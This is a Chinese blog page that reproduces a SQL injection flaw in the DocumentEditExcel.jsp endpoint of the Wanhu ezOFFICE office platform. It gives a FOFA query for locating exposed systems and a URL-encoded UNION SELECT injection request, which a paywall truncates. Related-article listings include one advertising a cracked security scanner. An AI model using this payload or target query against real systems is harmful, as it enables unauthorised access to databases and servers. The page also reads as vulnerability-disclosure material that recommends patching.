万户 ezOFFICE DocumentEditExcel.jsp接口sql注入

最新推荐文章于 2024-10-04 17:17:09 发布
最新推荐文章于 2024-10-04 17:17:09 发布
阅读量53 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136468820
版权
万户OA是一款综合办公平台,其DocumentEditExcel.jsp接口被发现存在SQL注入漏洞,允许未授权攻击者获取数据库权限,甚至进一步获取服务器权限。建议用户更新官方发布的补丁进行系统升级以修复此安全问题。
摘要由CSDN通过智能技术生成

产品简介
万户OA是万户网络技术有限公司OA设计的一款软件。他涵盖了共同办公、信息充分关系、各种业务系统的综合共同办公平台。
漏洞描述
万户 ezOFFICE DocumentEditExcel.jsp接口存在sql注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
fofa
app=”万户ezOFFICE协同管理平台”
漏洞复现

GET /defaultroot/public/iWebOfficeSign/DocumentEditExcel.jsp;?RecordID=%31%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%30%36%29%2b%43%48%41%52%28%31%30%36%29%2b%43%48%41%52%28%31%31%32%29%2b%43%48%41%52%28%31%31%33%29%2b%
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
万户 ezOFFICE DocumentEditExcel.jsp SQL注入漏洞
0xSec
01-31 682
万户 ezOFFICEDocumentEditExcel.jsp接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
万户 ezOFFICE DocumentEdit.jsp SQL注入漏洞复现
0xSec
12-10 1307
万户 ezOFFICEDocumentEdit.jsp 存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。
纸质办公电子化——iWebOffice中间件
赵丹丹 廊坊师范学院信息技术提高班 七期
11-04 4959
前言    这两天在公司使用了一个金格的办公的中间件产品——iWebOffice,感觉挺好用的,这次主要是使用它来实现套打功能。   正题    由于使用web页面打印调试位置比较麻烦,而且不同的浏览器要使用不同的打印机,所以我们这次的解决方案是使用iWebOffice组件在实现在web中嵌入word,通过书签读取数据库内容,然后使用word的打印功能(避免了不同浏览器选择不同打印机的弊端
万户 ezOFFICE DocumentEdit_deal.jsp SQL注入漏洞复现
0xSec
01-30 311
万户 ezOFFICEDocumentEdit_deal.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 1449
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
万户OA漏洞分析、利用与防护
不忘初心,护天下安全!
09-29 3407
万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限。万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。2.使用防火墙等设备对所有相关poc进行检测、防护。可直接上传恶意jsp文件。
万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC
nnn2188185的博客
11-29 463
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用。
万户OA ezOFFICE graph_include.jsp接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 292
万户OA ezOFFICE graph_include.jsp接口处存在SQL注入漏洞,未授权的攻击者可 利用此漏洞获取数据库权限,深入利用可获取服务器权限。
xray1.9.4高级社区版下载
qq_49869351的博客
01-12 7610
xray因其方便的代理检测模式,高效率,易于使用,和多样的poc闻名于安全圈。就这23年初始,xray就更新了1.9.4版本。已经添加了许可证,进行了pj。供大家下载,并且内置了superxray图像化界面,非常方便。
weboffice金格控件使用
石羊博客专栏
05-23 1万+
一、从官网下载jsp的示例代码 二、复制其中的edit.jsp中的大部分js方法到自己的文件 里,关键方法有body里的load(),unload()方法 三、一般要单独写个servlet作为weboffice的后台,打包示例代码中的class为jar导入项目,调用executerun()方法 问题1:数据格式或协议异常,一般是通过框架访问了后台造成的
金格插件WebOffice2015使用体会
热门推荐
didididi123321的博客
04-09 3万+
最近一段时间,在项目中集成了WebOffice2015的插件。有些心得体会,在这里和大家分享一下,不喜勿喷~~~~~~~~ 原项目中之前上传和下载附件集成的是WebOffice2003,由于新需求是实现文档(word)的在线编辑功能,所以这里集成WebOffice官网http://www.goldgrid.com/jinge_download/Index.aspx?num=5&first...
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 437
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 213
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
Web安全 - 跨站点请求伪造CSRF(Cross Site Request Forgery)
小工匠
09-29 1265
CSRF (Cross-Site Request Forgery,跨站请求伪造) 是一种攻击方式,攻击者诱导用户在不知情的情况下发起非授权的请求。例如,用户在登录某个站点后,攻击者通过社交工程等手段诱使用户点击包含恶意请求的链接,利用用户已登录的状态,发起用户意图之外的操作,如转账、修改账户设置等。:在每次受保护的请求中,服务器生成一个唯一的CSRF Token,注入到表单或请求头中。:对于敏感操作,可以要求用户进行额外的身份验证,如验证码或短信验证,防止攻击者即便利用用户的认证状态,也无法完成关键操作。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1158
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 975
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2324
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件。
选择网络安全模式启动Windows系统,解决PC无法连接网络问题
dvlinker的技术专栏
10-04 1581
选择网络安全模式启动Windows系统,解决PC无法连接网络问题。
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值